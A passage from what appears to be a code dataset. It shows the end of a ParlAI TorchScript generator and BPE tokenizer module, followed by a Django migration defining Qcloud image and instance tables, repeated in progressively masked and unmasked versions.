torch.clone(v) for k, v in initial_incr_state.items()}\n # Copy the initial incremental state, used when tracing the\n # .reorder_decoder_incremental_state() method below, to avoid having it be\n # mutated by the following line\n incr_state = wrapped_model.reorder_decoder_incremental_state(\n incr_state, torch.tensor([0], dtype=torch.long, device=sample_tokens.device)\n )\n generations = torch.cat([initial_generations, preds], dim=1)\n\n # Do tracing\n self.encoder = torch.jit.trace(agent.model.encoder, sample_tokens)\n self.decoder_first_pass = torch.jit.trace(\n wrapped_decoder, (initial_generations, encoder_states), strict=False\n )\n # We do strict=False to avoid an error when passing a Dict out of\n # decoder.forward()\n self.partially_traced_model = torch.jit.trace_module(\n wrapped_model,\n {\n 'output': (latent[:, -1:, :]),\n 'reorder_decoder_incremental_state': (\n initial_incr_state,\n torch.tensor([0], dtype=torch.long, device=sample_tokens.device),\n ),\n },\n strict=False,\n )\n self.decoder_later_pass = torch.jit.trace(\n wrapped_decoder, (generations, encoder_states, incr_state), strict=False\n )\n\n def _get_initial_decoder_input(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Workaround because we can't use TGM._get_initial_decoder_input() directly.\n\n When we try to call that function, we get a \"RuntimeError: Type 'Tuple[int,\n int]' cannot be traced. 
Only Tensors and (possibly nested) Lists, Dicts, and\n Tuples of Tensors can be traced\" error.\n \"\"\"\n bsz = x.size(0)\n return (\n torch.tensor(self.initial_decoder_input, dtype=torch.long)\n .expand(bsz, len(self.initial_decoder_input))\n .to(x.device)\n )\n\n def parse(self, text: str) -> List[int]:\n return self.dict.txt2vec(text)\n\n def _v2t(self, vec: List[int]) -> str:\n \"\"\"\n Convert token indices to string of tokens.\n \"\"\"\n new_vec: List[int] = []\n for i in vec:\n if i == self.end_idx:\n break\n elif i != self.start_idx:\n new_vec.append(i)\n return self.dict.vec2txt(new_vec)\n\n def forward(self, context: str, max_len: int = 128) -> str:\n\n # Vectorize all lines of context\n history_vecs: List[List[int]] = []\n context_lines = context.split('\\n')\n if self.history_size > 0:\n context_lines = context_lines[-self.history_size :]\n for line in context_lines:\n history_vecs.append(self.parse(line))\n\n # Get full history vec\n text_vecs: List[List[int]] = []\n for vec in history_vecs[:-1]:\n text_vecs += [vec]\n text_vecs += [self.delimiter_tok]\n text_vecs += [history_vecs[-1]]\n if self.global_end_token is not None:\n text_vecs += [[self.global_end_token]]\n\n # Flatten text_vecs\n flattened_text_vec: List[int] = []\n for vec in text_vecs:\n for token in vec:\n flattened_text_vec.append(token)\n\n # Format history vec given various logic\n if self.text_truncate is not None:\n if self.is_bart:\n truncate_length = self.text_truncate - 2 # Start and end tokens\n else:\n truncate_length = self.text_truncate\n if len(flattened_text_vec) > truncate_length:\n flattened_text_vec = flattened_text_vec[-truncate_length:]\n flattened_text_vec = torch.tensor(flattened_text_vec, dtype=torch.long)\n if self.is_bart:\n flattened_text_vec = torch.cat(\n [\n torch.tensor([self.start_idx], dtype=torch.long),\n flattened_text_vec,\n torch.tensor([self.end_idx], dtype=torch.long),\n ],\n dim=0,\n )\n\n # Pass through the encoder and decoder to generate tokens\n 
batch_text_vec = torch.unsqueeze(flattened_text_vec, dim=0) # Add batch dim\n encoder_states = self.encoder(batch_text_vec)\n generations = self._get_initial_decoder_input(batch_text_vec)\n # keep track of early stopping if all generations finish\n seen_end = torch.zeros(\n batch_text_vec.size(0), device=batch_text_vec.device, dtype=torch.bool\n )\n incr_state: Dict[str, torch.Tensor] = {}\n for token_idx in range(max_len):\n if token_idx == 0:\n latent, incr_state = self.decoder_first_pass(\n generations, encoder_states\n )\n else:\n latent, incr_state = self.decoder_later_pass(\n generations, encoder_states, incr_state\n )\n logits = self.partially_traced_model.output(latent[:, -1:, :])\n _, preds = logits.max(dim=2)\n incr_state = self.partially_traced_model.reorder_decoder_incremental_state(\n incr_state,\n torch.tensor([0], dtype=torch.long, device=batch_text_vec.device),\n )\n seen_end = seen_end + (preds == self.end_idx).squeeze(1)\n generations = torch.cat([generations, preds], dim=1)\n if torch.all(seen_end):\n break\n\n # Get the label from the generated tokens and update the history\n if self.is_bart:\n assert generations[0, 0].item() == self.end_idx\n generations = generations[:, 1:]\n # Hack: remove initial end token. I haven't found in the code where this is\n # done, but it seems to happen early on during generation\n generation_tokens: List[int] = generations[0].tolist()\n label = self._v2t(generation_tokens)\n\n return label\n\n\nclass BaseIncrStateFlattener(nn.Module):\n \"\"\"\n Flatten/unflatten the incremental state for use with TorchScripting.\n\n Typically, the incremental state will be stored as a Dict[int, Dict[str, Dict[str,\n torch.Tensor]]], where the 3 dictionary levels map decoder layer, attention type,\n and previous key/value/mask, respectively. However, TorchScript expects dicts to be\n of type Dict[str, torch.Tensor], and thus all input incremental states when\n TorchScripting will have to be of that type. 
We thus unflatten the input incremental\n state, already of type Dict[str, torch.Tensor], to pass it into whatever method\n needs it, and we flatten it again after the updated incremental state is passed back\n out.\n\n This is a base class that provides methods for flattening/unflattening: subclasses\n will call these methods as the incremental state is passed into and out of their own\n methods.\n \"\"\"\n\n def __init__(self, module: nn.Module):\n super().__init__()\n self.module = module\n\n def _unflatten_incr_state(\n self, flat_incr_state: Dict[str, torch.Tensor]\n ) -> Dict[int, Dict[str, Dict[str, torch.Tensor]]]:\n \"\"\"\n Unflatten the input incremental state.\n\n For instance, flat_incr_state['layer_0__self_attn__prev_key'] will be stored in\n structured_incr_state[0]['self_attn']['prev_key'].\n \"\"\"\n structured_incr_state = defaultdict(lambda: defaultdict(dict))\n for key, state in flat_incr_state.items():\n layer_idx_str, attn_type, state_type = key.split('__')\n structured_incr_state[int(layer_idx_str)][attn_type][state_type] = state\n return dict({k: dict(v) for k, v in structured_incr_state.items()})\n # Turn the nested defaultdicts back into regular dicts\n\n def _flatten_incr_state(\n self, structured_incr_state: Dict[int, Dict[str, Dict[str, torch.Tensor]]]\n ) -> Dict[str, torch.Tensor]:\n \"\"\"\n Flatten the input incremental state.\n\n For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored\n in flat_incr_state['layer_0__self_attn__prev_key'].\n \"\"\"\n flat_incr_state = {}\n for layer_idx, dict1 in structured_incr_state.items():\n for attn_type, dict2 in dict1.items():\n for state_type, state in dict2.items():\n key = f'{layer_idx:d}__{attn_type}__{state_type}'\n flat_incr_state[key] = state\n return flat_incr_state\n\n\nclass DecoderIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur 
before passing the incremental state into and out\n of .forward().\n \"\"\"\n\n def forward(\n self,\n input_: torch.LongTensor,\n encoder_state: Tuple[torch.Tensor, torch.Tensor],\n flat_incr_state: Optional[Dict[str, torch.Tensor]] = None,\n ) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n if flat_incr_state is not None:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n else:\n structured_incr_state = None\n tensor, new_structured_incr_state = self.module.forward(\n input=input_, encoder_state=encoder_state, incr_state=structured_incr_state\n )\n new_flat_incr_state = self._flatten_incr_state(new_structured_incr_state)\n return tensor, new_flat_incr_state\n\n\nclass ModelIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .reorder_decoder_incremental_state(). We also support .output(), which is also\n traced.\n \"\"\"\n\n def reorder_decoder_incremental_state(\n self, flat_incr_state: Dict[str, torch.Tensor], inds: torch.Tensor\n ) -> Dict[str, torch.Tensor]:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n new_structured_incr_state = self.module.reorder_decoder_incremental_state(\n incremental_state=structured_incr_state, inds=inds\n )\n return self._flatten_incr_state(new_structured_incr_state)\n\n def output(self, tensor: torch.Tensor) -> torch.Tensor:\n return self.module.output(tensor)\n\n\n@torch.jit.script\nclass ScriptableGpt2BpeHelper(object):\n \"\"\"\n Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.\n \"\"\"\n\n @classmethod\n def findall(cls, text: str) -> List[str]:\n \"\"\"\n Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.\n \"\"\"\n contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']\n\n tokens: List[str] = []\n idx = 0\n num_passes = 0\n while idx < len(text):\n 
num_passes += 1\n if num_passes > 10000:\n return ['*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***']\n if text[idx] == \"'\":\n # Capture contradiction suffixes\n captured_suffix = False\n for ending in contraction_endings:\n if text[idx + 1 : idx + 1 + len(ending)] == ending:\n tokens.append(\"'\" + ending)\n idx += 1 + len(ending)\n captured_suffix = True\n break\n if captured_suffix:\n continue\n if not text[idx].isspace() or (\n text[idx] == ' ' and idx + 1 < len(text) and not text[idx + 1].isspace()\n ):\n # Capture runs of one type of character\n if text[idx] == ' ':\n last_matching_idx = idx + 1\n else:\n last_matching_idx = idx\n if text[last_matching_idx].isalpha():\n while (\n last_matching_idx + 1 < len(text)\n and text[last_matching_idx + 1].isalpha()\n ):\n last_matching_idx += 1\n elif text[last_matching_idx].isnumeric():\n while (\n last_matching_idx + 1 < len(text)\n and text[last_matching_idx + 1].isnumeric()\n ):\n last_matching_idx += 1\n else:\n while (\n last_matching_idx + 1 < len(text)\n and not text[last_matching_idx + 1].isspace()\n and not text[last_matching_idx + 1].isalpha()\n and not text[last_matching_idx + 1].isnumeric()\n ):\n last_matching_idx += 1\n tokens.append(text[idx : last_matching_idx + 1])\n idx = last_matching_idx + 1\n continue\n if idx + 1 < len(text) and text[idx + 1].isspace():\n # Capture runs of space characters up until just before the final one\n last_space_idx = idx + 1\n while (\n last_space_idx + 1 < len(text)\n and text[last_space_idx + 1].isspace()\n ):\n last_space_idx += 1\n if last_space_idx + 1 == len(text):\n # Include the last char, which is a space char\n tokens.append(text[idx : last_space_idx + 1])\n idx = last_space_idx + 1\n else:\n tokens.append(text[idx:last_space_idx])\n idx = last_space_idx\n continue\n if True:\n # Capture runs of space characters\n last_space_idx = idx\n while (\n last_space_idx + 1 < len(text)\n and text[last_space_idx + 1].isspace()\n ):\n last_space_idx += 1\n 
tokens.append(text[idx : last_space_idx + 1])\n idx = last_space_idx + 1\n return tokens\n\n def __init__(\n self,\n add_prefix_space: bool,\n encoder: Dict[str, str],\n byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str],\n ):\n\n self.add_prefix_space = add_prefix_space\n\n self.encoder = encoder\n self.decoder: Dict[str, str] = {}\n for k, v in self.encoder.items():\n self.decoder[v] = k\n\n self.byte_encoder = byte_encoder\n self.byte_decoder: Dict[str, int] = {}\n for k, v in self.byte_encoder.items():\n self.byte_decoder[v] = k\n\n self.bpe_ranks = fused_key_bpe_ranks\n\n # special tokens\n self._special_tokens: Dict[str, int] = {}\n for st in special_tokens:\n self._special_tokens[st] = 1\n\n def encode(self, text: str) -> List[str]:\n \"\"\"\n Tokenize text.\n\n Checks for add_prefix_space; handles accordingly.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n if self.add_prefix_space:\n text = f' {text}'\n\n # constants for readability\n FINAL = 1\n SPLITABLE = 0\n pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]\n\n for special_token in self._special_tokens.keys():\n i = 0\n while i < len(pieces):\n subtext, status = pieces[i]\n if status == FINAL:\n i += 1\n continue\n split = subtext.split(special_token)\n if len(split) > 1:\n # special token detected, replace the chunk with small subchunks\n # split by the special token\n pieces.pop(i)\n for j, piece in enumerate(split):\n if j > 0:\n # add the special token as a delimiter\n pieces.insert(i + j, (special_token, FINAL))\n pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))\n else:\n i += 1\n\n output: List[str] = []\n for piece, state in pieces:\n if state is FINAL:\n output.append(piece)\n else:\n output += self.helper_encode(piece)\n text = ''.join(output)\n\n return output\n\n def get_pairs(self, word: List[str]) -> List[Tuple[str, str]]:\n \"\"\"\n Return set of symbol pairs in a word.\n\n Word is represented as 
list of symbols (symbols being variable-length strings).\n\n :param word:\n word to symbolize\n\n :return pairs:\n set of tuples of symbols\n \"\"\"\n pairs: List[Tuple[str, str]] = []\n prev_char = word[0]\n for char in word[1:]:\n pairs.append((prev_char, char))\n prev_char = char\n return pairs\n\n def bpe(self, word: List[str]) -> List[str]:\n \"\"\"\n Convert token to BPE.\n\n :param word:\n list of tokens token to convert\n\n :return bpe_encoding:\n string bpe encoding\n \"\"\"\n pairs = self.get_pairs(word)\n\n if len(pairs) == 0:\n return word\n\n while True:\n min_rank = self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf'))\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n\n if word[i] == first and i < len(word) - 1 and word[i + 1] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word\n\n def helper_encode(self, text: str) -> List[str]:\n \"\"\"\n Tokenize text.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n bpe_tokens: List[str] = []\n for token in self.findall(text):\n byte_encoded: List[str] = []\n for b in token:\n byte_encoded.append(self.byte_encoder[ord(b)])\n encoded: List[str] = []\n for bpe_token in self.bpe(byte_encoded):\n encoded.append(self.encoder[bpe_token])\n bpe_tokens.extend(encoded)\n return bpe_tokens\n\n def decode(self, tokens: List[str]) -> str:\n \"\"\"\n Decode list of tokens into a text 
string.\n\n :param tokens:\n list of tokens\n\n :return text:\n decoded text\n \"\"\"\n output: List[str] = []\n accum: List[str] = []\n for token in tokens:\n if token in self._special_tokens:\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n accum.clear()\n output.append(token)\n else:\n accum.append(token)\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n\n text = ''.join(output)\n if self.add_prefix_space:\n assert text.startswith(' ')\n text = text.lstrip(' ')\n return text\n\n def helper_decode(self, tokens: List[str]) -> str:\n \"\"\"\n Decode list of tokens into text string.\n\n :param tokens:\n list of tokens\n\n :return:\n decoded text\n \"\"\"\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n # We iterate over \"char\", which is supposed to be a single\n # character, because the TorchScripted version of the code\n # correctly splits a string into single characters in\n # self.utf8_chars() but the non-TorchScripted version doesn't\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)\n\n def utf8_chars(self, s: str) -> List[str]:\n \"\"\"\n An implementation of UTF8 character iteration in TorchScript. There are no\n bitwise operations in torchscript, so we compare directly to integer values.\n There isn't a lot of validation, for instance if you pass in an improperly\n encoded string with an out-of-place continuation byte, or with a non-left-to-\n right byte order, you'll get unexpected results and likely throw. Torch itself\n takes in unicode strings and encodes them as UTF8, so that should be actively\n hard to do.\n\n The logic is simple: looking at the current start-of-character byte.\n If its high bit is 0, it's a 1-byte character. 
Otherwise, the number of\n bytes is the number of leading 1s in its binary representation, so\n find that number by comparing it directly to ints with the appropriate\n representation, then append that many bytes as a character and move past\n them to the next start byte.\n\n From pytext.torchscript.utils.\n \"\"\"\n chars: List[str] = []\n i = 0\n while i < len(s):\n byte = ord(s[i])\n if byte < 0b10000000:\n chars.append(s[i])\n i += 1\n else:\n if byte < 0b11100000:\n num_bytes = 2\n elif byte < 0b11110000:\n num_bytes = 3\n elif byte < 0b11111000:\n num_bytes = 4\n elif byte < 0b11111100:\n num_bytes = 5\n elif byte < 0b11111110:\n num_bytes = 6\n elif byte < 0b11111111:\n num_bytes = 7\n else:\n num_bytes = 8\n chars.append(s[i : i + num_bytes])\n i += num_bytes\n return chars\n\n\n@torch.jit.script\nclass ScriptableDictionaryAgent:\n \"\"\"\n Builds and/or loads a dictionary.\n\n All code is TorchScriptable.\n \"\"\"\n\n def __init__(\n self,\n null_token: str,\n end_token: str,\n unk_token: str,\n start_token: str,\n freq: Dict[str, int],\n tok2ind: Dict[str, int],\n ind2tok: Dict[int, str],\n bpe_add_prefix_space: bool,\n bpe_encoder: Dict[str, str],\n bpe_byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str],\n ):\n\n self.null_token = null_token\n self.end_token = end_token\n self.unk_token = unk_token\n self.start_token = start_token\n\n self.freq = freq\n self.tok2ind = tok2ind\n self.ind2tok = ind2tok\n\n # cache unk token for later\n self._unk_token_idx = self.tok2ind[self.unk_token]\n\n # Initialize tokenizer\n self.bpe = ScriptableGpt2BpeHelper(\n add_prefix_space=bpe_add_prefix_space,\n encoder=bpe_encoder,\n byte_encoder=bpe_byte_encoder,\n fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=special_tokens,\n )\n\n def _word_lookup(self, key: str) -> int:\n \"\"\"\n Return index from token, or unk_token's index, or None.\n \"\"\"\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n 
return self._unk_token_idx\n\n def _index_lookup(self, key: int) -> str:\n \"\"\"\n Return token from index, or unk_token.\n \"\"\"\n if key in self.ind2tok:\n return self.ind2tok[key]\n else:\n return self.unk_token\n\n def gpt2_tokenize(self, text: str):\n \"\"\"\n Tokenize using Gpt2 BPE tokenizer.\n \"\"\"\n return self.bpe_tokenize(text)\n\n def tokenize(self, text: str) -> List[str]:\n \"\"\"\n Return a sequence of tokens from the iterable.\n\n Also handles special tokens for some tokenizers\n \"\"\"\n\n # calls the selected tokenizer function e.g. 're' => re_tokenize(text)\n word_tokens = self.gpt2_tokenize(text)\n\n return word_tokens\n\n def bpe_tokenize(self, text: str) -> List[str]:\n \"\"\"\n Return a sequence of BPE-tokens from the text.\n \"\"\"\n return self.bpe.encode(text)\n\n def txt2vec(self, text: str) -> List[int]:\n \"\"\"\n Convert a string to a vector (list of ints).\n\n First runs a sentence tokenizer, then a word tokenizer.\n \"\"\"\n itr: List[int] = []\n for token in self.tokenize(str(text)):\n itr.append(self._word_lookup(token))\n return itr\n\n def vec2txt(self, vector: List[int]) -> str:\n \"\"\"\n Convert a vector of IDs to a string.\n\n Converts a vector (iterable of ints) into a string, with each token separated by\n the delimiter (default ``' '``).\n \"\"\"\n tokens = [self._index_lookup(idx) for idx in vector]\n text = self.bpe.decode(tokens)\n return text\n",
"step-ids": [
24,
31,
32,
36,
43
]
}
|
[
24,
31,
32,
36,
43
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('home_application', '0019_auto_20170809_1810')]
operations = [migrations.CreateModel(name='QcloudImageInfo', fields=[(
'id', models.AutoField(verbose_name='ID', serialize=False,
auto_created=True, primary_key=True)), ('image_id', models.
CharField(max_length=50, verbose_name='镜像id')), ('osname', models.
CharField(max_length=50, verbose_name='操作系统名称')), ('image_size',
models.CharField(max_length=50, verbose_name='操作系统容量(GiB)')), (
'image_type', models.IntegerField(verbose_name='镜像类型')), (
'created_time', models.CharField(max_length=50, verbose_name=
'镜像创建时间')), ('image_state', models.CharField(max_length=50,
verbose_name='镜像状态')), ('image_source', models.CharField(max_length
=50, verbose_name='镜像来源')), ('image_name', models.CharField(
max_length=50, verbose_name='镜像名称')), ('image_description', models.
CharField(max_length=50, verbose_name='镜像详细描述')), ('image_creator',
models.CharField(max_length=50, verbose_name='镜像创建者')), (
'operation_mask', models.CharField(max_length=50, verbose_name=''))
], options={'db_table': 'qcloud_image_info'}), migrations.
CreateModel(name='QcloudInstanceInfo', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('instance_id', models.CharField(max_length=50,
verbose_name='实例id')), ('instance_name', models.CharField(
max_length=50, verbose_name='实例名称')), ('instance_type', models.
CharField(max_length=50, verbose_name='实例类型')), ('cpu', models.
CharField(max_length=50, verbose_name='cpu')), ('memory', models.
CharField(max_length=50, verbose_name='内存')), ('status', models.
CharField(max_length=50, verbose_name='实例状态')), ('zone', models.
CharField(max_length=50, verbose_name='实例所属地域')), (
'instance_charge_type', models.CharField(max_length=50,
verbose_name='实例计费模式')), ('private_ip_addresses', models.CharField(
max_length=50, verbose_name='内网ip')), ('public_ip_addresses',
models.CharField(max_length=50, verbose_name='外网ip')), ('image_id',
models.CharField(max_length=50, verbose_name='镜像id')), ('os_name',
models.CharField(max_length=50, verbose_name='操作系统名称')), (
'system_disk_type', models.CharField(max_length=50, verbose_name=
'系统盘类型')), ('system_disk_size', models.CharField(max_length=50,
verbose_name='系统盘尺寸')), ('renew_flag', models.CharField(max_length=
50, verbose_name='自动续费标识')), ('internet_max_bandwidth_out', models.
CharField(max_length=50, verbose_name='实例网络带宽上限')), (
'internet_charge_type', models.CharField(max_length=50,
verbose_name='实例网络计费类型')), ('created_time', models.DateTimeField(
default=django.utils.timezone.now, verbose_name='实例创建时间')), (
'expired_time', models.DateTimeField(default=django.utils.timezone.
now, verbose_name='实例到期时间'))], options={'db_table':
'qcloud_instance_info'})]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [('home_application', '0019_auto_20170809_1810')]
operations = [migrations.CreateModel(name='QcloudImageInfo', fields=[(
'id', models.AutoField(verbose_name='ID', serialize=False,
auto_created=True, primary_key=True)), ('image_id', models.
CharField(max_length=50, verbose_name='镜像id')), ('osname', models.
CharField(max_length=50, verbose_name='操作系统名称')), ('image_size',
models.CharField(max_length=50, verbose_name='操作系统容量(GiB)')), (
'image_type', models.IntegerField(verbose_name='镜像类型')), (
'created_time', models.CharField(max_length=50, verbose_name=
'镜像创建时间')), ('image_state', models.CharField(max_length=50,
verbose_name='镜像状态')), ('image_source', models.CharField(max_length
=50, verbose_name='镜像来源')), ('image_name', models.CharField(
max_length=50, verbose_name='镜像名称')), ('image_description', models.
CharField(max_length=50, verbose_name='镜像详细描述')), ('image_creator',
models.CharField(max_length=50, verbose_name='镜像创建者')), (
'operation_mask', models.CharField(max_length=50, verbose_name=''))
], options={'db_table': 'qcloud_image_info'}), migrations.
CreateModel(name='QcloudInstanceInfo', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('instance_id', models.CharField(max_length=50,
verbose_name='实例id')), ('instance_name', models.CharField(
max_length=50, verbose_name='实例名称')), ('instance_type', models.
CharField(max_length=50, verbose_name='实例类型')), ('cpu', models.
CharField(max_length=50, verbose_name='cpu')), ('memory', models.
CharField(max_length=50, verbose_name='内存')), ('status', models.
CharField(max_length=50, verbose_name='实例状态')), ('zone', models.
CharField(max_length=50, verbose_name='实例所属地域')), (
'instance_charge_type', models.CharField(max_length=50,
verbose_name='实例计费模式')), ('private_ip_addresses', models.CharField(
max_length=50, verbose_name='内网ip')), ('public_ip_addresses',
models.CharField(max_length=50, verbose_name='外网ip')), ('image_id',
models.CharField(max_length=50, verbose_name='镜像id')), ('os_name',
models.CharField(max_length=50, verbose_name='操作系统名称')), (
'system_disk_type', models.CharField(max_length=50, verbose_name=
'系统盘类型')), ('system_disk_size', models.CharField(max_length=50,
verbose_name='系统盘尺寸')), ('renew_flag', models.CharField(max_length=
50, verbose_name='自动续费标识')), ('internet_max_bandwidth_out', models.
CharField(max_length=50, verbose_name='实例网络带宽上限')), (
'internet_charge_type', models.CharField(max_length=50,
verbose_name='实例网络计费类型')), ('created_time', models.DateTimeField(
default=django.utils.timezone.now, verbose_name='实例创建时间')), (
'expired_time', models.DateTimeField(default=django.utils.timezone.
now, verbose_name='实例到期时间'))], options={'db_table':
'qcloud_instance_info'})]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('home_application', '0019_auto_20170809_1810'),
]
operations = [
migrations.CreateModel(
name='QcloudImageInfo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('image_id', models.CharField(max_length=50, verbose_name='\u955c\u50cfid')),
('osname', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u540d\u79f0')),
('image_size', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u5bb9\u91cf\uff08GiB\uff09')),
('image_type', models.IntegerField(verbose_name='\u955c\u50cf\u7c7b\u578b')),
('created_time', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u521b\u5efa\u65f6\u95f4')),
('image_state', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u72b6\u6001')),
('image_source', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u6765\u6e90')),
('image_name', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u540d\u79f0')),
('image_description', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u8be6\u7ec6\u63cf\u8ff0')),
('image_creator', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u521b\u5efa\u8005')),
('operation_mask', models.CharField(max_length=50, verbose_name='')),
],
options={
'db_table': 'qcloud_image_info',
},
),
migrations.CreateModel(
name='QcloudInstanceInfo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('instance_id', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8bid')),
('instance_name', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u540d\u79f0')),
('instance_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7c7b\u578b')),
('cpu', models.CharField(max_length=50, verbose_name='cpu')),
('memory', models.CharField(max_length=50, verbose_name='\u5185\u5b58')),
('status', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u72b6\u6001')),
('zone', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u6240\u5c5e\u5730\u57df')),
('instance_charge_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u8ba1\u8d39\u6a21\u5f0f')),
('private_ip_addresses', models.CharField(max_length=50, verbose_name='\u5185\u7f51ip')),
('public_ip_addresses', models.CharField(max_length=50, verbose_name='\u5916\u7f51ip')),
('image_id', models.CharField(max_length=50, verbose_name='\u955c\u50cfid')),
('os_name', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u540d\u79f0')),
('system_disk_type', models.CharField(max_length=50, verbose_name='\u7cfb\u7edf\u76d8\u7c7b\u578b')),
('system_disk_size', models.CharField(max_length=50, verbose_name='\u7cfb\u7edf\u76d8\u5c3a\u5bf8')),
('renew_flag', models.CharField(max_length=50, verbose_name='\u81ea\u52a8\u7eed\u8d39\u6807\u8bc6')),
('internet_max_bandwidth_out', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7f51\u7edc\u5e26\u5bbd\u4e0a\u9650')),
('internet_charge_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7f51\u7edc\u8ba1\u8d39\u7c7b\u578b')),
('created_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\u5b9e\u4f8b\u521b\u5efa\u65f6\u95f4')),
('expired_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\u5b9e\u4f8b\u5230\u671f\u65f6\u95f4')),
],
options={
'db_table': 'qcloud_instance_info',
},
),
]
|
flexible
|
{
"blob_id": "a1db566f4da16e7725212aeab29e946ef7c1672e",
"index": 5610,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('home_application', '0019_auto_20170809_1810')]\n operations = [migrations.CreateModel(name='QcloudImageInfo', fields=[(\n 'id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('image_id', models.\n CharField(max_length=50, verbose_name='镜像id')), ('osname', models.\n CharField(max_length=50, verbose_name='操作系统名称')), ('image_size',\n models.CharField(max_length=50, verbose_name='操作系统容量(GiB)')), (\n 'image_type', models.IntegerField(verbose_name='镜像类型')), (\n 'created_time', models.CharField(max_length=50, verbose_name=\n '镜像创建时间')), ('image_state', models.CharField(max_length=50,\n verbose_name='镜像状态')), ('image_source', models.CharField(max_length\n =50, verbose_name='镜像来源')), ('image_name', models.CharField(\n max_length=50, verbose_name='镜像名称')), ('image_description', models.\n CharField(max_length=50, verbose_name='镜像详细描述')), ('image_creator',\n models.CharField(max_length=50, verbose_name='镜像创建者')), (\n 'operation_mask', models.CharField(max_length=50, verbose_name=''))\n ], options={'db_table': 'qcloud_image_info'}), migrations.\n CreateModel(name='QcloudInstanceInfo', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('instance_id', models.CharField(max_length=50,\n verbose_name='实例id')), ('instance_name', models.CharField(\n max_length=50, verbose_name='实例名称')), ('instance_type', models.\n CharField(max_length=50, verbose_name='实例类型')), ('cpu', models.\n CharField(max_length=50, verbose_name='cpu')), ('memory', models.\n CharField(max_length=50, verbose_name='内存')), ('status', models.\n CharField(max_length=50, verbose_name='实例状态')), ('zone', models.\n CharField(max_length=50, verbose_name='实例所属地域')), 